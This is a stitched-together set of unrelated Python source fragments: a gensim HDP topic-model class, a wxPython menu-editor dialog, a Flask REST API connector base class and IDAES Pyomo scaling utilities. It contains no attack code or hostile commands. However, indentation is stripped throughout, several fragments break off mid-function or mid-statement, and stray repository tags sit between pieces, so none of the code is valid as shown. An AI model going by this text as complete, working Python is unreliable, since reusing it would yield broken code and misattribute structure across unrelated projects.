Indicates number of documents finished processing and are to be saved.
"""
if not self.outputdir:
logger.error("cannot store topics without having specified an output directory")
if doc_count is None:
fname = 'final'
else:
fname = 'doc-%i' % doc_count
fname = '%s/%s.topics' % (self.outputdir, fname)
logger.info("saving topics to %s", fname)
betas = self.m_lambda + self.m_eta
np.savetxt(fname, betas)
@deprecated("This method will be removed in 4.0.0, use `save` instead.")
def save_options(self):
"""Writes all the values of the attributes for the current model in "options.dat" file.
Warnings
--------
This method is deprecated, use :meth:`~gensim.models.hdpmodel.HdpModel.save` instead.
"""
if not self.outputdir:
logger.error("cannot store options without having specified an output directory")
return
fname = '%s/options.dat' % self.outputdir
with utils.open(fname, 'wb') as fout:
fout.write('tau: %s\n' % str(self.m_tau - 1))
fout.write('chunksize: %s\n' % str(self.chunksize))
| |
following item -> move up the following item
self._move_item_left(index)
#self.selected_index = index-1
for s in (self.name, self.id, self.label, self.help_str, self.event_handler):
s.SetValue("")
self.check_radio.SetSelection(0)
self.menu_items.DeleteItem(self.selected_index)
if not self.menu_items.GetItemCount():
self._enable_fields(False)
self.selected_index -= 1
self.menu_items.Select(self.selected_index)
def add_items(self, menus):
"""adds the content of 'menus' to self.menu_items. menus is a sequence of
trees which describes the structure of the menus"""
indent = " " * 4
if compat.IS_CLASSIC:
set_item = self.menu_items.SetStringItem
add_item = self.menu_items.InsertStringItem
else:
set_item = self.menu_items.SetItem
add_item = self.menu_items.InsertItem
index = [0]
def add(node, level):
i = index[0]
add_item(i, misc.wxstr(indent * level + node.label.lstrip().replace("\t","\\t")))
set_item(i, 1, misc.wxstr(node.handler))
set_item(i, 2, misc.wxstr(node.name))
set_item(i, 4, misc.wxstr(node.help_str))
set_item(i, 5, misc.wxstr(node.id))
if node.label==node.name==node.id=='---':
set_item(i, 3, '')
else:
item_type = 0
try:
if node.checkable and int(node.checkable):
item_type = 1
elif int(node.radio):
item_type = 2
except ValueError:
pass
set_item(i, 3, misc.wxstr(item_type))
index[0] += 1
for item in node.children:
add(item, level+1)
for tree in menus:
add(tree.root, 0)
if self.menu_items.GetItemCount():
self._enable_fields()
def get_menus(self):
"""returns the contents of self.menu_items as a list of trees which
describe the structure of the menus in the format used by EditMenuBar"""
#def get(i, j): return self.menu_items.GetItem(i, j).GetText()
def get(i, j): return self.menu_items.GetItem(i, j).GetText()
trees = []
def add(node, index):
label = get(index, 0).lstrip().replace("\\t", "\t")
id = get(index, 5)
name = get(index, 2)
help_str = get(index, 4)
event_handler = get(index, 1)
try:
item_type = int(get(index, 3))
except ValueError:
item_type = 0
checkable = item_type == 1 and misc.wxstr("1") or misc.wxstr("")
radio = item_type == 2 and misc.wxstr("1") or misc.wxstr("")
n = MenuTree.Node(label, id, name, help_str, checkable, radio, handler=event_handler)
node.children.append(n)
n.parent = node
return n
level = 0
curr_item = None
for index in range(self.menu_items.GetItemCount()):
label = get(index, 0).replace("\\t", "\t")
lvl = self.item_level(index) # get the indentation level
if not lvl:
t = MenuTree( get(index, 2), label, id=get(index, 5), handler=get(index, 1) )
curr_item = t.root
level = 1
trees.append(t)
continue
elif lvl < level:
for i in range(level-lvl):
curr_item = curr_item.parent
level = lvl
elif lvl > level:
curr_item = curr_item.children[-1]
level = lvl
add(curr_item, index)
return trees
def _move_item_left(self, index):
if index > 0:
if ( index+1 < self.menu_items.GetItemCount() and (self.item_level(index) < self.item_level(index+1)) ):
return
label = self.menu_items.GetItem(index, 0).GetText()
if label[:4] == " ":
self.menu_items.SetStringItem(index, 0, label[4:])
self.menu_items.SetItemState(index, wx.LIST_STATE_SELECTED, wx.LIST_STATE_SELECTED)
self._enable_buttons()
def move_item_left(self, event):
"""moves the selected menu item one level up in the hierarchy, i.e.
shifts its label 4 spaces left in self.menu_items"""
self.menu_items.SetFocus()
self._move_item_left(self.selected_index)
def _move_item_right(self, index):
if index > 0 and (self.item_level(index) <= self.item_level(index-1)):
label = self.menu_items.GetItem(index, 0).GetText()
self.menu_items.SetStringItem(index, 0, misc.wxstr(" "*4) + label)
self.menu_items.SetItemState(index, wx.LIST_STATE_SELECTED, wx.LIST_STATE_SELECTED)
self._enable_buttons()
def move_item_right(self, event):
"""moves the selected menu item one level down in the hierarchy, i.e.
shifts its label 4 spaces right in self.menu_items"""
self.menu_items.SetFocus()
self._move_item_right(self.selected_index)
def move_item_up(self, event):
"moves the selected menu item before the previous one at the same level in self.menu_items"
self.menu_items.SetFocus()
index = self._do_move_item(event, self.selected_index, False)
if index is not None:
state = wx.LIST_STATE_SELECTED | wx.LIST_STATE_FOCUSED
self.menu_items.SetItemState(index, state, state)
def _do_move_item(self, event, index, is_down):
"""internal function used by move_item_up and move_item_down.
Returns the new index of the moved item, or None if no change occurred"""
#index = self.selected_index
if index <= 0: return None
def get(i, j): return self.menu_items.GetItem(i, j).GetText()
def getall(i): return [get(i, j) for j in range(6)]
level = self.item_level(index)
items_to_move = [ getall(index) ]
i = index+1
while i < self.menu_items.GetItemCount():
# collect the items to move up
if level < self.item_level(i):
items_to_move.append(getall(i))
i += 1
else: break
i = index-1
while i >= 0:
lvl = self.item_level(i)
if level == lvl: break
elif level > lvl: return None
i -= 1
delete = self.menu_items.DeleteItem
insert = self.menu_items.InsertStringItem
set = self.menu_items.SetStringItem
for j in range(len(items_to_move)-1, -1, -1):
delete(index+j)
items_to_move.reverse()
for label, id, name, help_str, check_radio, event_handler in items_to_move:
i = insert(i, label)
set(i, 1, id)
set(i, 2, name)
set(i, 3, help_str)
set(i, 4, check_radio)
set(i, 5, event_handler)
ret_idx = i
if is_down: ret_idx += len(items_to_move)
return ret_idx
def move_item_down(self, event):
"moves the selected menu item after the next one at the same level in self.menu_items"
self.menu_items.SetFocus()
index = self.selected_index
self.selected_index = -1
if index < 0: return
def get(i, j): return self.menu_items.GetItem(i, j).GetText()
def getall(i): return [get(i, j) for j in range(6)]
level = self.item_level(index)
i = index+1
while i < self.menu_items.GetItemCount():
# collect the items to move down
if level < self.item_level(i):
i += 1
else: break
if i < self.menu_items.GetItemCount():
# _do_move_item works with selected_index, so we must assing to
# it the right value before the call
#self.selected_index = i
self.selected_index = self._do_move_item(event, i, True)
# fix bug 698071
state = wx.LIST_STATE_SELECTED | wx.LIST_STATE_FOCUSED
self.menu_items.SetItemState(self.selected_index, state, state)
else:
# restore the selected index
self.selected_index = index
# the action buttons are not linked to ESC and Enter to avoid accidental modifications
def on_cancel(self, event):
self.EndModal(wx.ID_CANCEL)
def on_OK(self, event):
self.EndModal(wx.ID_OK)
class MenuProperty(np.Property):
"Property to edit the menus of an EditMenuBar instance"
def __init__(self):
np.Property.__init__(self, [])
#self.menu_items = {}
def create_editor(self, panel, sizer):
self.edit_btn = wx.Button(panel, -1, _("Edit menus..."))
sizer.Add(self.edit_btn, 0, wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT, 4)
self.edit_btn.Bind(wx.EVT_BUTTON, self.edit_menus)
def edit_menus(self, event=None):
if hasattr(self, "edit_btn") and self.edit_btn:
parent = self.edit_btn.GetTopLevelParent()
elif self.owner.widget:
parent = self.owner.widget.GetTopLevelParent()
else:
parent = None
dialog = MenuItemDialog( parent, self.owner, items=self.value )
if not self.value: dialog.add_item(None)
if dialog.ShowModal() == wx.ID_OK:
self.on_value_edited(dialog.get_menus())
dialog.Destroy()
def write(self, output, tabs):
inner_xml = []
for menu in self.get():
menu.write(inner_xml, tabs+1)
output.extend( common.format_xml_tag( u'menus', inner_xml, tabs, is_xml=True ) )
class MenuHandler(BaseXmlBuilderTagHandler):
itemattrs = ['label', 'id', 'name', 'help_str', 'checkable', 'radio', 'handler']
def __init__(self, owner):
super(MenuHandler, self).__init__()
self.owner = owner
self.menus = []
self.curr_menu = []
self.curr_item = None
self.curr_index = 0
self.menu_depth = 0
def start_elem(self, name, attrs):
if name == 'menus': return
if name == 'menu':
self.menu_depth += 1
if self.menu_depth == 1:
t = MenuTree(attrs['name'],
attrs['label'],
attrs.get('itemid', ''),
attrs.get('help_str', ''),
handler=attrs.get('handler', ''))
self.curr_menu.append( (t.root,) )
#self.owner.menus.append(t)
#self.owner.properties["menus"].value.append(t)
self.menus.append(t)
return
node = MenuTree.Node(label=attrs['label'],
name=attrs['name'],
id=attrs.get('itemid', ''),
help_str=attrs.get('help_str', ''),
handler=attrs.get('handler', ''))
cm = self.curr_menu[-1]
cm[0].children.append(node)
node.parent = cm[0]
menu = wx.Menu()
self.curr_menu.append( (node, menu) )
elif name == 'item':
self.curr_item = MenuTree.Node()
else:
try: self.curr_index = self.itemattrs.index(name)
except ValueError:
# ignore unknown attributes...
self.curr_index = -1
pass
def end_elem(self, name):
if name == 'item':
if self.curr_item.handler == self.curr_item.name == self.curr_item.label == '---' and not self.curr_item.id:
# fix bug from 0.8 where separators were created with handler '---' instead of id
self.curr_item.id = '---'
self.curr_item.handler = ''
try: cm = self.curr_menu[-1]
except IndexError:
from xml_parse import XmlParsingError
raise XmlParsingError(_("menu item outside a menu"))
cm[0].children.append(self.curr_item)
self.curr_item.parent = cm[0]
elif name == 'menu':
self.menu_depth -= 1
self.curr_menu.pop()
elif name == 'menus':
#self.owner.set_menus(self.owner.menus)
#self.owner.properties["menus"].set(self.owner.menus)
self.owner.properties["menus"].set(self.menus)
self.owner.properties_changed(["menus"])
return True
def char_data(self, data):
super(MenuHandler, self).char_data(data)
char_data = self.get_char_data()
setattr(self.curr_item, self.itemattrs[self.curr_index], char_data)
class EditMenuBar(EditBase, PreviewMixin):
__hidden_frame = None # used on GTK to reparent a menubar before deletion
_PROPERTIES = ["menus", "preview"]
PROPERTIES = EditBase.PROPERTIES + _PROPERTIES + EditBase.EXTRA_PROPERTIES
def __init__(self, name, klass, parent):
custom_class = parent is None
EditBase.__init__(self, name, klass, parent, wx.NewId(), custom_class=custom_class)
self.base = 'wxMenuBar'
self.menus = MenuProperty()
self.window_id = None # just a dummy for code generation
self._mb = None # the real menubar
if not self.parent:
PreviewMixin.__init__(self) # add a preview button
self._is_toplevel = True
else:
self.preview = None
self._is_toplevel = False
def create_widget(self):
if wx.Platform == '__WXGTK__' and not EditMenuBar.__hidden_frame:
EditMenuBar.__hidden_frame = wx.Frame(common.main, -1, "")
EditMenuBar.__hidden_frame.Hide()
if self.parent:
self.widget = self._mb = wx.MenuBar()
if self.parent.widget: self.parent.widget.SetMenuBar(self.widget)
if wx.Platform == '__WXMSW__' or wx.Platform == '__WXMAC__':
self.widget.SetFocus = lambda : None
else:
# "top-level" menubar
self.widget = wx.Frame(None, -1, misc.design_title(self.name))
self.widget.SetClientSize((400, 30))
self._mb = wx.MenuBar()
self.widget.SetMenuBar(self._mb)
self.widget.SetBackgroundColour(self._mb.GetBackgroundColour())
import os
icon = compat.wx_EmptyIcon()
xpm = os.path.join(config.icons_path, 'menubar.xpm')
icon.CopyFromBitmap(misc.get_xpm_bitmap(xpm))
self.widget.SetIcon(icon)
self.widget.Bind(wx.EVT_CLOSE, lambda e: self.hide_widget())
self.widget.Bind(wx.EVT_LEFT_DOWN, self.on_set_focus)
self.set_menus() # show the menus
def set_menus(self):
if not self._mb: return # nothing left to do
for i in range(self._mb.GetMenuCount()):
self._mb.Remove(0)
def append(menu, items):
for item in items:
if item.name == '---': # item is a separator
menu.AppendSeparator()
elif item.children:
m = wx.Menu()
append(m, item.children)
menu.AppendMenu( wx.NewId(), misc.wxstr(item.label), m, misc.wxstr(item.help_str) | |
<filename>restapi/connectors/__init__.py
import abc
import os
from datetime import datetime, timedelta
from pathlib import Path
from types import ModuleType, TracebackType
from typing import Any, Dict, Generic, List, Optional, Tuple, Type, TypeVar
# mypy: ignore-errors
from flask import Flask
from flask import _app_ctx_stack as stack
from restapi.config import (
ABS_RESTAPI_PATH,
BACKEND_PACKAGE,
CUSTOM_PACKAGE,
EXTENDED_PACKAGE,
EXTENDED_PROJECT_DISABLED,
TESTING,
)
from restapi.env import Env
from restapi.exceptions import ServiceUnavailable
from restapi.services.authentication import BaseAuthentication, NoAuthentication
from restapi.tests_initialization import initialize_testing_environment
from restapi.utilities import print_and_exit
from restapi.utilities.globals import mem
from restapi.utilities.logs import log
from restapi.utilities.meta import Meta
# https://mypy.readthedocs.io/en/latest/generics.html#generic-methods-and-generic-self
T = TypeVar("T", bound="Connector")
CONNECTORS_FOLDER = "connectors"
NO_AUTH = "NO_AUTHENTICATION"
# thread-id.ConnectorName.params-unique-key = instance
InstancesCache = Dict[int, Dict[str, Dict[str, T]]]
# service-name => dict of variables
Services = Dict[str, Dict[str, str]]
ExceptionsList = Optional[Tuple[Type[Exception]]]
class Connector(metaclass=abc.ABCMeta):
authentication_service: str = Env.get("AUTH_SERVICE", NO_AUTH)
# Available services with associated env variables
services: Services = {}
# Assigned by init_app
app: Flask = None
# Used by get_authentication_module
_authentication_module: Optional[ModuleType] = None
# Returned by __getattr__ in neo4j, sqlalchemy and mongo connectors
_models: Dict[str, Type] = {}
# Used by set_object and get_object
_instances: InstancesCache = {}
def __init__(self) -> None:
# This is the lower-cased class name (neomodel, celeryext)
self.name = self.__class__.__name__.lower()
# This is the folder name corresponding to the connector name (neo4j, celery, )
# self.__class__.__module__ == restapi.connectors.sqlalchemy
# .split(".") == ['restapi', 'connectors', 'sqlalchemy']
# [-1] == 'sqlalchemy'
self.name = self.__class__.__module__.split(".")[-1]
# Will be modified by self.disconnect()
self.disconnected = False
# Added to convince mypy that self.app cannot be None
if self.app is None: # pragma: no cover
# This should never happen because app is
# assigned during init_services
from flask import current_app
self.app = current_app
@staticmethod
def init() -> None:
if Connector.authentication_service == NO_AUTH:
log.info("No Authentication service configured")
else:
log.debug("Authentication service: {}", Connector.authentication_service)
Connector.services = Connector.load_connectors(
ABS_RESTAPI_PATH, BACKEND_PACKAGE, Connector.services
)
if EXTENDED_PACKAGE != EXTENDED_PROJECT_DISABLED:
Connector.services = Connector.load_connectors(
Path(EXTENDED_PACKAGE),
EXTENDED_PACKAGE,
Connector.services,
)
Connector.services = Connector.load_connectors(
Path(CUSTOM_PACKAGE), CUSTOM_PACKAGE, Connector.services
)
Connector.load_models(Connector.services.keys())
def __del__(self) -> None:
if not self.disconnected:
self.disconnect()
def __enter__(self: T) -> T:
return self
def __exit__(
self,
exctype: Optional[Type[Exception]],
excinst: Optional[Exception],
exctb: Optional[TracebackType],
) -> bool:
if not self.disconnected:
self.disconnect()
return True
return False # pragma: no cover
@staticmethod
@abc.abstractmethod
def get_connection_exception() -> ExceptionsList: # pragma: no cover
return None
@abc.abstractmethod
def connect(self: T, **kwargs: Any) -> Generic[T]: # pragma: no cover
return self
@abc.abstractmethod
def disconnect(self) -> None: # pragma: no cover
return
@abc.abstractmethod
def is_connected(instance: T) -> bool: # pragma: no cover
return True
def destroy(self) -> None: # pragma: no cover
print_and_exit("Missing destroy method in {}", self.__class__.__name__)
def initialize(self) -> None: # pragma: no cover
print_and_exit("Missing initialize method in {}", self.__class__.__name__)
@property
def variables(self) -> Dict[str, str]:
return self.services.get(self.name) or {}
@classmethod
def load_connectors(cls, path: Path, module: str, services: Services) -> Services:
main_folder = path.joinpath(CONNECTORS_FOLDER)
if not main_folder.is_dir():
log.debug("Connectors folder not found: {}", main_folder)
return services
for connector in main_folder.iterdir():
if not connector.is_dir():
continue
connector_name = connector.name
if connector_name.startswith("_"):
continue
# This is the only exception... we should rename sqlalchemy as alchemy
if connector_name == "sqlalchemy":
variables = Env.load_variables_group(prefix="alchemy")
else:
variables = Env.load_variables_group(prefix=connector_name)
if not Env.to_bool(
variables.get("enable_connector", True)
): # pragma: no cover
log.debug("{} connector is disabled", connector_name)
continue
external = False
if "host" in variables:
if host := variables.get("host"):
external = cls.is_external(host)
# HOST found in variables but empty... never happens during tests
else: # pragma: no cover
variables["enable"] = "0"
enabled = Env.to_bool(variables.get("enable"))
# Celery is always enabled, if connector is enabled
# No further check is needed on host/external
available = enabled or external or connector_name == "celery"
if not available:
continue
connector_module = Connector.get_module(connector_name, module)
connector_class = Connector.get_class(connector_module)
# Can't test connector misconfiguration...
if not connector_class: # pragma: no cover
log.error("No connector class found in {}/{}", main_folder, connector)
continue
try:
# This is to test the Connector compliance,
# i.e. to verify instance and get_instance in the connector module
# and verify that the Connector can be instanced
connector_module.instance
connector_module.get_instance
connector_class()
except AttributeError as e: # pragma: no cover
print_and_exit(e)
services[connector_name] = variables
log.debug("Got class definition for {}", connector_class)
return services
def load_models(connectors: List[str]) -> None:
for connector in connectors:
# Models are strictly core-dependent. If you need to enable models starting
# from a custom connector this function has to be refactored:
# 1) now is checked the existence of models.py in ABS_RESTAPI_PATH/connector
# 2) Core model is mandatory
# 3) Connector class, used to inject models is taken from BACKEND_PACKAGE
models_path = ABS_RESTAPI_PATH.joinpath(
CONNECTORS_FOLDER, connector, "models.py"
)
if not models_path.is_file():
log.debug("No model found for {}", connector)
continue
log.debug("Loading models from {}", connector)
base_models = Meta.import_models(connector, BACKEND_PACKAGE, mandatory=True)
if EXTENDED_PACKAGE == EXTENDED_PROJECT_DISABLED:
extended_models = {}
else:
extended_models = Meta.import_models(connector, EXTENDED_PACKAGE)
custom_models = Meta.import_models(connector, CUSTOM_PACKAGE)
log.debug(
"Models loaded from {}: core {}, extended {}, custom {}",
connector,
len(base_models),
len(extended_models),
len(custom_models),
)
connector_module = Connector.get_module(connector, BACKEND_PACKAGE)
connector_class = Connector.get_class(connector_module)
if connector_class:
connector_class.set_models(base_models, extended_models, custom_models)
else: # pragma: no cover
log.error("Connector class not found for {}", connector)
@staticmethod
def get_module(connector: str, module: str) -> Optional[ModuleType]:
return Meta.get_module_from_string(
".".join((module, CONNECTORS_FOLDER, connector))
)
@staticmethod
def get_class(connector_module: Optional[ModuleType]) -> Optional[Type]:
if not connector_module: # pragma: no cover
return False
classes = Meta.get_new_classes_from_module(connector_module)
for connector_class in classes.values():
if issubclass(connector_class, Connector):
return connector_class
return None # pragma: no cover
@staticmethod
def get_authentication_instance() -> BaseAuthentication:
if Connector.authentication_service == NO_AUTH:
return NoAuthentication()
if not Connector._authentication_module:
Connector._authentication_module = Connector.get_module(
Connector.authentication_service, BACKEND_PACKAGE
)
if not Connector._authentication_module: # pragma: no cover
log.critical("{} not available", Connector.authentication_service)
raise ServiceUnavailable("Authentication service not available")
return Connector._authentication_module.Authentication()
@staticmethod
def init_app(app: Flask, worker_mode: bool = False) -> None:
Connector.app = app
if Connector.authentication_service == NO_AUTH:
return
if (
Connector.authentication_service not in Connector.services
): # pragma: no cover
print_and_exit(
"Auth service '{}' is not available", Connector.authentication_service
)
authentication_instance = Connector.get_authentication_instance()
authentication_instance.module_initialization()
@staticmethod
def project_init(options: Optional[Dict[str, bool]] = None) -> None:
if Connector.authentication_service != NO_AUTH:
authentication_instance = Connector.get_authentication_instance()
connector_module = Connector.get_module(
Connector.authentication_service, BACKEND_PACKAGE
)
connector = connector_module.get_instance()
log.debug("Initializing {}", Connector.authentication_service)
connector.initialize()
if options is None:
options: Dict[str, bool] = {}
with Connector.app.app_context():
authentication_instance.init_auth_db(options)
log.info("Initialized authentication module")
initializer = mem.initializer()
if initializer:
log.info("Vanilla project has been initialized")
else: # pragma: no cover
log.error("Errors during custom initialization")
if TESTING:
# Core test initialization
initialize_testing_environment(authentication_instance)
# Custom test initialization
initializer.initialize_testing_environment()
@staticmethod
def project_clean() -> None:
if Connector.authentication_service != NO_AUTH:
connector_module = Connector.get_module(
Connector.authentication_service, BACKEND_PACKAGE
)
connector = connector_module.get_instance()
log.debug("Destroying {}", Connector.authentication_service)
connector.destroy()
@classmethod
def set_models(
cls,
base_models: Dict[str, Type],
extended_models: Dict[str, Type],
custom_models: Dict[str, Type],
) -> None:
# Join models as described by issue #16
cls._models = base_models
for m in [extended_models, custom_models]:
for key, model in m.items():
# Verify if overriding => replace
if key in base_models.keys():
if issubclass(model, base_models[key]): # pragma: no cover
log.debug("Overriding model {}", key)
cls._models[key] = model
continue
# Otherwise just append
cls._models[key] = model
if len(cls._models) > 0:
log.debug("Models loaded")
@staticmethod
def is_external(host: str) -> bool:
return not host.endswith(".dockerized.io")
@classmethod
def set_object(cls, name: str, obj: T, key: str = "[]") -> None:
"""set object into internal array"""
tid = os.getpid()
cls._instances.setdefault(tid, {})
cls._instances[tid].setdefault(name, {})
cls._instances[tid][name][key] = obj
@classmethod
def get_object(cls, name: str, key: str = "[]") -> Optional[T]:
"""recover object if any"""
tid = os.getpid()
cls._instances.setdefault(tid, {})
cls._instances[tid].setdefault(name, {})
return cls._instances[tid][name].get(key, None)
# From server.teardown... not executed during tests
@classmethod
def disconnect_all(cls) -> None: # pragma: no cover
for connectors in cls._instances.values():
for instances in connectors.values():
for instance in instances.values():
if not instance.disconnected:
log.info(
"Disconnecting {} {}", instance.name, hex(id(instance))
)
instance.disconnect()
cls._instances.clear()
log.info("[{}] All connectors disconnected", os.getpid())
def initialize_connection(
self, expiration: int, verification: int, **kwargs: str
) -> T:
# Create a new instance of itself
obj = self.__class__()
exceptions = obj.get_connection_exception()
if exceptions is None:
exceptions = (Exception,)
try:
obj = obj.connect(**kwargs)
except exceptions as e:
log.error("{} raised {}: {}", obj.name, e.__class__.__name__, e)
raise ServiceUnavailable(
{
"Service Unavailable": "This service is temporarily unavailable, "
"please retry in a few minutes"
}
)
obj.connection_time = datetime.now()
obj.connection_verification_time = None
if verification > 0:
ver = obj.connection_time + timedelta(seconds=verification)
obj.connection_verification_time = ver
obj.connection_expiration_time = None
if expiration > 0:
| |
<gh_stars>0
#################################################################################
# The Institute for the Design of Advanced Energy Systems Integrated Platform
# Framework (IDAES IP) was produced under the DOE Institute for the
# Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021
# by the software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University
# Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and
# license information.
#################################################################################
"""
This module contains utilities to provide variable and expression scaling
factors by providing an expression to calculate them via a suffix.
The main purpose of this code is to use the calculate_scaling_factors function
to calculate scaling factors to be used with the Pyomo scaling transformation or
with solvers. A user can provide a scaling_expression suffix to calculate scale
factors from existing variable scaling factors. This allows scaling factors from
a small set of fundamental variables to be propagated to the rest of the model.
The scaling_expression suffix contains Pyomo expressions with model variables.
The expressions can be evaluated with variable scaling factors in place of
variables to calculate additional scaling factors.
"""
__author__ = "<NAME>, <NAME>, <NAME>"
from math import log10
import scipy.sparse.linalg as spla
import scipy.linalg as la
import pyomo.environ as pyo
from pyomo.core.expr.visitor import identify_variables
from pyomo.network import Arc
from pyomo.contrib.pynumero.interfaces.pyomo_nlp import PyomoNLP
from pyomo.common.modeling import unique_component_name
from pyomo.core.base.constraint import _ConstraintData
from pyomo.common.collections import ComponentMap
from pyomo.util.calc_var_value import calculate_variable_from_constraint
import idaes.logger as idaeslog
_log = idaeslog.getLogger(__name__)
def __none_mult(x, y):
"""PRIVATE FUNCTION, If x or y is None return None, else return x * y"""
if x is not None and y is not None:
return x * y
return None
def scale_arc_constraints(blk):
"""Find Arc constraints in a block and its subblocks. Then scale them based
on the minimum scaling factor of the variables in the constraint.
Args:
blk: Block in which to look for Arc constraints to scale.
Returns:
None
"""
for arc in blk.component_data_objects(Arc, descend_into=True):
arc_block = arc.expanded_block
if arc_block is None: # arc not expanded or port empty?
_log.warning(
f"{arc} has no constraints. Has the Arc expansion transform "
"been applied?")
continue
for c in arc_block.component_data_objects(pyo.Constraint, descend_into=True):
sf = min_scaling_factor(identify_variables(c.body))
constraint_scaling_transform(c, sf)
def map_scaling_factor(iter, default=1, warning=False, func=min, hint=None):
"""Map get_scaling_factor to an iterable of Pyomo components, and call func
on the result. This could be use, for example, to get the minimum or
maximum scaling factor of a set of components.
Args:
iter: Iterable yielding Pyomo components
default: The default value used when a scaling factor is missing. The
default is default=1.
warning: Log a warning for missing scaling factors
func: The function to call on the resulting iterable of scaling factors.
The default is min().
hint: Paired with warning=True, this is a string to indicate where the
missing scaling factor was being accessed, to easier diagnose issues.
Returns:
The result of func on the set of scaling factors
"""
return func(
map(
lambda x: get_scaling_factor(
x, default=default, warning=warning, hint=hint),
iter
)
)
def min_scaling_factor(iter, default=1, warning=True, hint=None):
"""Map get_scaling_factor to an iterable of Pyomo components, and get the
minimum scaling factor.
Args:
iter: Iterable yielding Pyomo components
default: The default value used when a scaling factor is missing. If
None, this will raise an exception when scaling factors are missing.
The default is default=1.
warning: Log a warning for missing scaling factors
hint: Paired with warning=True, this is a string to indicate where the
missing scaling factor was being accessed, to easier diagnose issues.
Returns:
Minimum scaling factor of the components in iter
"""
return map_scaling_factor(iter, default=default, warning=warning, func=min)
def propagate_indexed_component_scaling_factors(
blk,
typ=None,
overwrite=False,
descend_into=True):
"""Use the parent component scaling factor to set all component data object
scaling factors.
Args:
blk: The block on which to search for components
typ: Component type(s) (default=(Var, Constraint, Expression, Param))
overwrite: if a data object already has a scaling factor should it be
overwrittten (default=False)
descend_into: descend into child blocks (default=True)
"""
if typ is None:
typ = (pyo.Var, pyo.Constraint, pyo.Expression)
for c in blk.component_objects(typ, descend_into=descend_into):
if get_scaling_factor(c) is not None and c.is_indexed():
for cdat in c.values():
if overwrite or get_scaling_factor(cdat) is None:
set_scaling_factor(cdat, get_scaling_factor(c))
def calculate_scaling_factors(blk):
"""Look for calculate_scaling_factors methods and run them. This uses a
recursive function to execute the subblock calculate_scaling_factors
methods first.
"""
def cs(blk2):
""" Recursive function for to do subblocks first"""
for b in blk2.component_data_objects(pyo.Block, descend_into=False):
cs(b)
if hasattr(blk2, "calculate_scaling_factors"):
blk2.calculate_scaling_factors()
# Call recursive function to run calculate_scaling_factors on blocks from
# the bottom up.
cs(blk)
# If a scale factor is set for an indexed component, propagate it to the
# component data if a scale factor hasn't already been explicitly set
propagate_indexed_component_scaling_factors(blk)
# Use the variable scaling factors to scale the arc constraints.
scale_arc_constraints(blk)
def set_scaling_factor(c, v, data_objects=True):
"""Set a scaling factor for a model component. This function creates the
scaling_factor suffix if needed.
Args:
c: component to supply scaling factor for
v: scaling factor
data_objects: set scaling factors for indexed data objects (default=True)
Returns:
None
"""
if isinstance(c, (float, int)):
# property packages can return 0 for material balance terms on components
# doesn't exist. This handles the case where you get a constant 0 and
# need it's scale factor to scale the mass balance.
return 1
try:
suf = c.parent_block().scaling_factor
except AttributeError:
c.parent_block().scaling_factor = pyo.Suffix(direction=pyo.Suffix.EXPORT)
suf = c.parent_block().scaling_factor
suf[c] = v
if data_objects and c.is_indexed():
for cdat in c.values():
suf[cdat] = v
def get_scaling_factor(c, default=None, warning=False, exception=False, hint=None):
"""Get a component scale factor.
Args:
c: component
default: value to return if no scale factor exists (default=None)
warning: whether to log a warning if a scaling factor is not found
(default=False)
exception: whether to riase an Exception if a scaling factor is not
found (default=False)
hint: (str) a string to add to the warning or exception message to help
loacate the source.
Returns:
scaling factor (float)
"""
try:
sf = c.parent_block().scaling_factor[c]
except (AttributeError, KeyError):
if hint is None:
h = ""
else:
h = f", {hint}"
if warning:
if hasattr(c, "is_component_type") and c.is_component_type():
_log.warning(f"Missing scaling factor for {c}{h}")
else:
_log.warning(f"Trying to get scaling factor for unnamed expr {h}")
if exception and default is None:
if hasattr(c, "is_component_type") and c.is_component_type():
_log.error(f"Missing scaling factor for {c}{h}")
else:
_log.error(f"Trying to get scaling factor for unnamed expr {h}")
raise
sf = default
return sf
def unset_scaling_factor(c, data_objects=True):
"""Delete a component scaling factor.
Args:
c: component
Returns:
None
"""
try:
del c.parent_block().scaling_factor[c]
except (AttributeError, KeyError):
pass # no scaling factor suffix, is fine
try:
if data_objects and c.is_indexed():
for cdat in c.values():
del cdat.parent_block().scaling_factor[cdat]
except (AttributeError, KeyError):
pass # no scaling factor suffix, is fine
def populate_default_scaling_factors(c):
"""
Method to set default scaling factors for a number of common quantities
based of typical values expressed in SI units. Values are converted to
those used by the property package using Pyomo's unit conversion tools.
"""
units = c.get_metadata().derived_units
si_scale = {"temperature": (100*pyo.units.K, "temperature"),
"pressure": (1e5*pyo.units.Pa, "pressure"),
"dens_mol_phase": (100*pyo.units.mol/pyo.units.m**3,
"density_mole"),
"enth_mol": (1e4*pyo.units.J/pyo.units.mol, "energy_mole"),
"entr_mol": (100*pyo.units.J/pyo.units.mol/pyo.units.K,
"entropy_mole"),
"fug_phase_comp": (1e4*pyo.units.Pa, "pressure"),
"fug_coeff_phase_comp": (1*pyo.units.dimensionless, None),
"gibbs_mol": (1e4*pyo.units.J/pyo.units.mol, "energy_mole"),
"mole_frac_comp": (0.001*pyo.units.dimensionless, None),
"mole_frac_phase_comp": (0.001*pyo.units.dimensionless, None),
"mw": (1e-3*pyo.units.kg/pyo.units.mol, "molecular_weight"),
"mw_phase": (1e-3*pyo.units.kg/pyo.units.mol,
"molecular_weight")}
for p, f in si_scale.items():
# If a defautl scaling factor exists, do not over write it
if p not in c.default_scaling_factor.keys():
if f[1] is not None:
v = pyo.units.convert(f[0], to_units=units[f[1]])
else:
v = f[0]
sf = 1/(10**round(log10(pyo.value(v))))
c.set_default_scaling(p, sf)
def __set_constraint_transform_applied_scaling_factor(c, v):
"""PRIVATE FUNCTION Set the scaling factor used to transform a constraint.
This is used to keep track of scaling transformations that have been applied
to constraints.
Args:
c: component to supply scaling factor for
v: scaling factor
Returns:
None
"""
try:
c.parent_block().constraint_transformed_scaling_factor[c] = v
except AttributeError:
c.parent_block().constraint_transformed_scaling_factor = pyo.Suffix(
direction=pyo.Suffix.LOCAL)
c.parent_block().constraint_transformed_scaling_factor[c] = v
def get_constraint_transform_applied_scaling_factor(c, default=None):
"""Get a the scale factor that was used to transform a
constraint.
Args:
c: constraint data object
default: value to return if no scaling factor exists (default=None)
Returns:
The scaling factor that has been used to transform the constraint or the
default.
"""
